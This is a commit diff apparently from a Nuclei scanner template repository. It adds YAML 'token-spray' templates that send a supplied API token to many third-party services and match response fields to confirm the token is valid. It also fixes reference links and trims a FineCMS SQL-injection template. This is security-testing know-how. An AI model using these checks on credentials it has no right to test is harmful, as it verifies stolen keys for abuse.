GET https://api.lob.com/v1/addresses HTTP/1.1
Authorization: Basic {{base64(token + ':')}}
Host: api.lob.com
matchers:
- type: word
part: body
words:
- '"id"'
- '"description"'
- '"name"'
condition: and

25
token-spray/api-mac-address-lookup.yaml Normal file
View File

@ -0,0 +1,25 @@
id: api-mac-address-lookup
info:
name: MAC Address Lookup API Test
author: daffainfo
severity: info
reference:
- https://macaddress.io/api
- https://github.com/daffainfo/all-about-apikey/blob/main/Development/MAC%20Address%20Lookup.md
tags: token-spray,macaddresslookup
self-contained: true
requests:
- method: GET
path:
- "https://api.macaddress.io/v1?apiKey={{token}}&output=json&search=44:38:39:ff:ef:57"
matchers:
- type: word
part: body
words:
- '"vendorDetails"'
- '"companyName"'
- '"companyAddress"'
condition: and

2
token-spray/api-malshare.yaml
View File

@ -6,7 +6,7 @@ info:
severity: info
reference:
- https://malshare.com/doc.php
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/MalShare.md
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/MalShare.md
tags: token-spray,malshare
self-contained: true

2
token-spray/api-malwarebazaar.yaml
View File

@ -6,7 +6,7 @@ info:
severity: info
reference:
- https://bazaar.abuse.ch/api/
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/MalwareBazaar.md
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/MalwareBazaar.md
tags: token-spray,malwarebazaar
self-contained: true

2
token-spray/api-mywot.yaml
View File

@ -6,7 +6,7 @@ info:
severity: info
reference:
- https://support.mywot.com/hc/en-us/sections/360004477734-API-
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/Web%20of%20Trust.md
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/Web%20of%20Trust.md
tags: token-spray,weboftrust
self-contained: true

27
token-spray/api-open-page-rank.yaml Normal file
View File

@ -0,0 +1,27 @@
id: api-open-page-rank
info:
name: Open Page Rank API Test
author: daffainfo
severity: info
reference:
- https://www.domcop.com/openpagerank/documentation
- https://github.com/daffainfo/all-about-apikey/blob/main/Development/Open%20Page%20Rank.md
tags: token-spray,openpagerank
self-contained: true
requests:
- raw:
- |
GET https://openpagerank.com/api/v1.0/getPageRank?domains[]=google.com HTTP/1.1
Host: openpagerank.com
API-OPR: {{token}}
matchers:
- type: word
part: body
words:
- '"page_rank_integer"'
- '"page_rank_decimal"'
- '"rank"'
condition: and

25
token-spray/api-opengraphr.yaml Normal file
View File

@ -0,0 +1,25 @@
id: api-opengraphr
info:
name: OpenGraphr API Test
author: daffainfo
severity: info
reference:
- https://opengraphr.com/docs/1.0/overview
- https://github.com/daffainfo/all-about-apikey/blob/main/Development/OpenGraphr.md
tags: token-spray,opengraphr
self-contained: true
requests:
- method: GET
path:
- "https://api.opengraphr.com/v1/og?api_token={{token}}&url=https://google.com"
matchers:
- type: word
part: body
words:
- '"title"'
- '"image"'
- '"url"'
condition: and

24
token-spray/api-pagecdn.yaml Normal file
View File

@ -0,0 +1,24 @@
id: api-pagecdn
info:
name: PageCDN API Test
author: daffainfo
severity: info
reference:
- https://pagecdn.com/docs/public-api
- https://github.com/daffainfo/all-about-apikey/blob/main/Development/PageCDN.md
tags: token-spray,pagecdn
self-contained: true
requests:
- method: GET
path:
- "https://pagecdn.com/api/v2/private/account/info?apikey={{token}}"
matchers:
- type: word
part: body
words:
- '"username"'
- '"email"'
condition: and

25
token-spray/api-proxycrawl.yaml Normal file
View File

@ -0,0 +1,25 @@
id: api-proxycrawl
info:
name: ProxyCrawl API Test
author: daffainfo
severity: info
reference:
- https://proxycrawl.com/docs/
- https://github.com/daffainfo/all-about-apikey/blob/main/Development/ProxyCrawl.md
tags: token-spray,proxycrawl
self-contained: true
requests:
- method: GET
path:
- "https://api.proxycrawl.com/leads?token={{token}}&domain=www.amazon.com"
matchers:
- type: word
part: body
words:
- '"remaining_requests"'
- '"domain"'
- '"leads"'
condition: and

25
token-spray/api-proxykingdom.yaml Normal file
View File

@ -0,0 +1,25 @@
id: api-proxykingdom
info:
name: ProxyKingdom API Test
author: daffainfo
severity: info
reference:
- https://proxykingdom.com/documentation
- https://github.com/daffainfo/all-about-apikey/blob/main/Development/ProxyKingdom.md
tags: token-spray,proxykingdom
self-contained: true
requests:
- method: GET
path:
- "https://api.proxykingdom.com/proxy?token={{token}}"
matchers:
- type: word
part: body
words:
- '"address"'
- '"port"'
- '"protocol"'
condition: and

2
token-spray/api-rijksmuseum.yaml
View File

@ -6,7 +6,7 @@ info:
severity: info
reference:
- https://data.rijksmuseum.nl/user-generated-content/api/
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Rijksmuseum.md
- https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Rijksmuseum.md
tags: token-spray,rijksmuseum
self-contained: true

22
token-spray/api-savepage.yaml Normal file
View File

@ -0,0 +1,22 @@
id: api-savepage
info:
name: SavePage API Test
author: daffainfo
severity: info
reference:
- https://docs.savepage.io
- https://github.com/daffainfo/all-about-apikey/blob/main/Development/SavePage.md
tags: token-spray,savepage
self-contained: true
requests:
- method: GET
path:
- "https://api.savepage.io/v1?key={{token}}&q=https://selfcontained.test"
matchers:
- type: word
part: body
words:
- 'getaddrinfo ENOTFOUND selfcontained.test'

2
token-spray/api-scanii.yaml
View File

@ -6,7 +6,7 @@ info:
severity: info
reference:
- https://docs.scanii.com/v2.1/resources.html
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/Scanii.md
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/Scanii.md
tags: token-spray,scanii
self-contained: true

25
token-spray/api-scraperapi.yaml Normal file
View File

@ -0,0 +1,25 @@
id: api-scraperapi
info:
name: ScraperAPI API Test
author: daffainfo
severity: info
reference:
- https://www.scraperapi.com/documentation/
- https://github.com/daffainfo/all-about-apikey/blob/main/Development/ScraperAPI.md
tags: token-spray,scraperapi
self-contained: true
requests:
- method: GET
path:
- "http://api.scraperapi.com/account?api_key={{token}}"
matchers:
- type: word
part: body
words:
- '"concurrencyLimit"'
- '"concurrentRequests"'
- '"requestLimit"'
condition: and

27
token-spray/api-scraperbox.yaml Normal file
View File

@ -0,0 +1,27 @@
id: api-scraperbox
info:
name: ScraperBox API Test
author: daffainfo
severity: info
reference:
- https://scraperbox.com/documentation
- https://github.com/daffainfo/all-about-apikey/blob/main/Development/ScraperBox.md
tags: token-spray,scraperbox
self-contained: true
requests:
- method: GET
path:
- "https://api.scraperbox.com/scrape?token={{token}}&url=https://example.com"
matchers-condition: and
matchers:
- type: status
status:
- 304
- type: word
part: body
words:
- '<title>Example Domain</title>'

22
token-spray/api-scrapestack.yaml Normal file
View File

@ -0,0 +1,22 @@
id: api-scrapestack
info:
name: Scrapestack API Test
author: daffainfo
severity: info
reference:
- https://scrapestack.com/documentation
- https://github.com/daffainfo/all-about-apikey/blob/main/Development/scrapestack.md
tags: token-spray,scrapestack
self-contained: true
requests:
- method: GET
path:
- "https://api.scrapestack.com/scrape?access_key={{token}}&url=https://example.com"
matchers:
- type: word
part: body
words:
- '<title>Example Domain</title>'

30
token-spray/api-scrapingant.yaml Normal file
View File

@ -0,0 +1,30 @@
id: api-scrapingant
info:
name: ScrapingAnt API Test
author: daffainfo
severity: info
reference:
- https://docs.scrapingant.com/
- https://github.com/daffainfo/all-about-apikey/blob/main/Development/ScrapingAnt.md
tags: token-spray,scrapingant
self-contained: true
requests:
- raw:
- |
POST https://api.scrapingant.com/v1/general HTTP/1.1
Host: api.scrapingant.com
x-api-key: {{token}}
Content-Type: application/json
{"url": "https://example.com"}
matchers:
- type: word
part: body
words:
- '"content"'
- '"cookies"'
- '"status_code"'
condition: and

22
token-spray/api-scrapingdog.yaml Normal file
View File

@ -0,0 +1,22 @@
id: api-scrapingdog
info:
name: ScrapingDog API Test
author: daffainfo
severity: info
reference:
- https://www.scrapingdog.com/documentation
- https://github.com/daffainfo/all-about-apikey/blob/main/Development/ScrapingDog.md
tags: token-spray,scrapingdog
self-contained: true
requests:
- method: GET
path:
- "https://api.scrapingdog.com/scrape?api_key={{token}}&url=https://example.com/ip&dynamic=false"
matchers:
- type: word
part: body
words:
- '<title>Example Domain</title>'

24
token-spray/api-screenshotapi.yaml Normal file
View File

@ -0,0 +1,24 @@
id: api-screenshotapi
info:
name: ScreenshotAPI API Test
author: daffainfo
severity: info
reference:
- https://docs.screenshotapi.net/?ref=webflow
- https://github.com/daffainfo/all-about-apikey/blob/main/Development/Screenshot%20API.md
tags: token-spray,screenshotapi
self-contained: true
requests:
- method: GET
path:
- "https://shot.screenshotapi.net/screenshot?token={{token}}&url=https://example.com"
matchers:
- type: word
part: body
words:
- 'screenshot'
- 'url'
condition: and

26
token-spray/api-segment.yaml Normal file
View File

@ -0,0 +1,26 @@
id: api-segment
info:
name: Segment API Test
author: geeknik
severity: info
reference:
- https://reference.segmentapis.com/
tags: token-spray,segment
self-contained: true
requests:
- raw:
- |
GET https://platform.segmentapis.com/v1beta/workspaces/myworkspace HTTP/1.1
Host: platform.segmentapis.com
Authorization: Bearer {{token}}
Content-Type: application/json
matchers:
- type: word
part: body
words:
- '"name":'
- '"id"'
condition: and

25
token-spray/api-serpstack.yaml Normal file
View File

@ -0,0 +1,25 @@
id: api-serpstack
info:
name: serpstack API Test
author: daffainfo
severity: info
reference:
- https://serpstack.com/documentation
- https://github.com/daffainfo/all-about-apikey/blob/main/Development/serpstack.md
tags: token-spray,serpstack
self-contained: true
requests:
- method: GET
path:
- "http://api.serpstack.com/search?access_key={{token}}&query=mcdonalds"
matchers:
- type: word
part: body
words:
- '"total_time_taken"'
- '"processed_timestamp"'
- '"search_url"'
condition: and

28
token-spray/api-supportivekoala.yaml Normal file
View File

@ -0,0 +1,28 @@
id: api-supportivekoala
info:
name: Supportivekoala API Test
author: daffainfo
severity: info
reference:
- https://developers.supportivekoala.com/
- https://github.com/daffainfo/all-about-apikey/blob/main/Development/Supportivekoala.md
tags: token-spray,supportivekoala
self-contained: true
requests:
- raw:
- |
GET https://api.supportivekoala.com/v1/images HTTP/1.1
Host: api.supportivekoala.com
Content-Type: application/json
Authorization: Bearer {{token}}
matchers:
- type: word
part: body
words:
- '"_id"'
- '"template"'
- '"imageUrl"'
condition: and

2
token-spray/api-urlscan.yaml
View File

@ -6,7 +6,7 @@ info:
severity: info
reference:
- https://urlscan.io/docs/api/
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/URLScan.md
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/URLScan.md
tags: token-spray,urlscan
self-contained: true

2
token-spray/api-virustotal.yaml
View File

@ -6,7 +6,7 @@ info:
severity: info
reference:
- https://developers.virustotal.com/reference
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/VirusTotal.md
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/VirusTotal.md
tags: token-spray,virustotal
self-contained: true

2
token-spray/api-wordcloud.yaml
View File

@ -6,7 +6,7 @@ info:
severity: info
reference:
- https://wordcloudapi.com/getting-started
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Word%20Cloud.md
- https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Word%20Cloud.md
tags: token-spray,wordcloud
self-contained: true

25
token-spray/api-wordnik.yaml Normal file
View File

@ -0,0 +1,25 @@
id: api-wordnik
info:
name: Wordnik API Test
author: daffainfo
severity: info
reference:
- https://developer.wordnik.com/docs
- https://github.com/daffainfo/all-about-apikey/blob/main/Dictionaries/Wordnik.md
tags: token-spray,wordnik
self-contained: true
requests:
- method: GET
path:
- "https://api.wordnik.com/v4/word.json/hedgehog/topExample?useCanonical=false&api_key={{token}}"
matchers:
- type: word
part: body
words:
- '"provider"'
- '"year"'
- '"rating"'
condition: and

22
token-spray/api-zenrows.yaml Normal file
View File

@ -0,0 +1,22 @@
id: api-zenrows
info:
name: ZenRows API Test
author: daffainfo
severity: info
reference:
- https://www.zenrows.com/documentation/
- https://github.com/daffainfo/all-about-apikey/blob/main/Development/ZenRows.md
tags: token-spray,zenrows
self-contained: true
requests:
- method: GET
path:
- "https://api.zenrows.com/v1/?apikey={{token}}&url=https://example.com"
matchers:
- type: word
part: body
words:
- '<title>Example Domain</title>'

1
vulnerabilities/other/finecms-sqli.yaml
View File

@ -17,6 +17,5 @@ requests:
matchers:
- type: word
part: header
words:
- '{{md5("{{randstr}}")}}'